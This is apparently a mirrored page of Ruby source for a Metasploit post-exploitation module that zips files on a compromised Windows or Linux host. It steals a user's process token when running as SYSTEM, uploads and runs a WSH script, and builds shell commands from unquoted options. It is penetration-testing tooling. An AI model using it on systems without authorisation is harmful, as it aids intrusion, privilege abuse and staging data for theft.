CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/multi/manage/zip.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Windows::Priv89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Multi Manage File Compressor',14'Description' => %q{15This module zips a file or a directory. On Linux, it uses the zip command.16On Windows, it will try to use remote target's 7Zip if found. If not, it falls17back to its Windows Scripting Host.18},19'License' => MSF_LICENSE,20'Author' => [ 'sinn3r' ],21'Platform' => [ 'win', 'linux' ],22'SessionTypes' => [ 'meterpreter', 'shell' ],23'Compat' => {24'Meterpreter' => {25'Commands' => %w[26stdapi_sys_config_rev2self27stdapi_sys_config_steal_token28]29}30}31)32)3334register_options(35[36OptString.new('DESTINATION', [true, 'The destination path']),37OptString.new('SOURCE', [true, 'The directory or file to compress'])38]39)40end4142def get_program_file_path43get_env('ProgramFiles')44end4546def has_7zip?47file?("#{get_program_file_path}\\7-Zip\\7z.exe")48end4950def wsh_script(dst, src)51script_file = File.read(File.join(Msf::Config.data_directory, 'post', 'zip', 'zip.js'))52src.gsub!('\\', '\\\\\\')53dst.gsub!('\\', '\\\\\\')54script_file << "zip(\"#{src}\",\"#{dst}\");".force_encoding('UTF-8')55script_file56end5758def find_pid_by_user(username)59computer_name = get_env('COMPUTERNAME')60print_status("Searching for PID for #{computer_name}\\\\#{username}")61session.sys.process.processes.each do |p|62if p['user'] == "#{computer_name}\\#{username}"63return p['pid']64end65end6667nil68end6970def steal_token71current_user = get_env('USERNAME')72pid = find_pid_by_user(current_user)7374unless pid75fail_with(Failure::Unknown, "Unable to find a PID for #{current_user} to execute WSH")76end7778print_status("Stealing token from PID #{pid} for #{current_user}")79begin80session.sys.config.steal_token(pid)81rescue Rex::Post::Meterpreter::RequestError => e82# It could raise an exception even when the token is successfully stolen,83# so we will just log the exception and move on.84elog(e)85end8687@token_stolen = true88end8990def upload_exec_wsh_script_zip91if is_system?92unless session93print_error('Unable to compress with WSH technique without Meterpreter')94return95end9697steal_token98end99100script = wsh_script(datastore['DESTINATION'], datastore['SOURCE'])101tmp_path = "#{get_env('TEMP')}\\zip.js"102print_status("script file uploaded to #{tmp_path}")103write_file(tmp_path, script.encode('UTF-16LE'))104cmd_exec("cscript.exe #{tmp_path}")105end106107def do_7zip108program_file_path = get_program_file_path109output = cmd_exec("#{program_file_path}\\7-Zip\\7z.exe a -tzip \"#{datastore['DESTINATION']}\" \"#{datastore['SOURCE']}\"")110vprint_line(output)111end112113def do_zip114output = cmd_exec("zip -D -q -r #{datastore['DESTINATION']} #{datastore['SOURCE']}")115vprint_line(output)116end117118def windows_zip119if has_7zip?120print_status("Compressing #{datastore['DESTINATION']} via 7zip")121do_7zip122else123print_status("Compressing #{datastore['DESTINATION']} via WSH")124upload_exec_wsh_script_zip125end126end127128def linux_zip129print_status("Compressing #{datastore['DESTINATION']} via zip")130do_zip131end132133def cleanup134if @token_stolen && session135session.sys.config.revert_to_self136print_status('Token restored.')137end138139super140end141142def run143@token_stolen = false144145if session.platform == 'windows'146windows_zip147else148linux_zip149end150end151end152153154